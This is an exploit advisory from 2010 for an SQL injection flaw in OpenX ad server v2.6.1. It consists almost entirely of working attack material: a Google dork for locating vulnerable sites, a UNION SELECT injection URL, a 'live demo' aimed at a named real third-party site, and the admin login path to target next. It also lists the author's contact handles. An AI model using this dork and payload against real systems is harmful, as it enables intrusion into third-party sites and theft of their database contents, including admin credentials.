#=Info=======================================================================# # Software: OpenX Sql Injection # # Version: v2.6.1 # # Vulnerability: Sql Injection # # Google Dork: inurl:"index.php?q=" Openx # # Off. site: www.openx.org/ # #============================================================================# #=Author=====================================================================# # Author: AndySoon [at] XGROUPVN[dot]ORG and UH-TEAM[dot]ORG # # Date: 2010-01-21 # # Contact: YM: wolf_seller | email: wolf.crazy0@gmail.com # # # #============================================================================# #=Sql Injection===========================================================================================================================================================# # Exploit: http://site/index.php?q=shopping/neighborhood/45+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- # # Live demo: http://la.citymommy.com/index.php?q=shopping/neighborhood/45+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- # # Login page: http://site/adserver/www/admin/index.php # #=========================================================================================================================================================================#